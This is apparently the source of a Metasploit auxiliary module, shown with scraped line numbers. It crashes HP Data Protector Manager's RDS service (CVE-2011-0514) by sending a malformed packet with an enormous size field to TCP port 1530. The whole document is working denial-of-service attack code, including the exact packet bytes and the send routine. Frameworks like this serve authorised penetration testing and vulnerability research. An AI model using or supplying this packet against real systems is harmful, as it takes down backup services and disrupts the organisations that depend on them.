Path: blob/master/modules/auxiliary/dos/hp/data_protector_rds.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'HP Data Protector Manager RDS DOS',14'Description' => %q{15This module causes a remote DOS on HP Data Protector's RDS service. By sending16a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous17size for malloc().18},19'Author' => [20'Roi Mallo <rmallof[at]gmail.com>', # initial discovery, poc21'sinn3r', # msf22],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2011-0514' ],26[ 'OSVDB', '70617' ],27[ 'EDB', '15940' ],28],29'DisclosureDate' => '2011-01-08',30'Notes' => {31'Stability' => [CRASH_SERVICE_DOWN],32'SideEffects' => [],33'Reliability' => []34}35)36)3738register_options([39Opt::RPORT(1530),40])41end4243def run44buf = "\x23\x8c\x29\xb6" # Header45buf << "\x64\x00\x00\x00" # Packet size46buf << "\x41" * 4 # Data4748connect49print_status('Sending malformed packet...')50sock.put(buf)51disconnect52end53end545556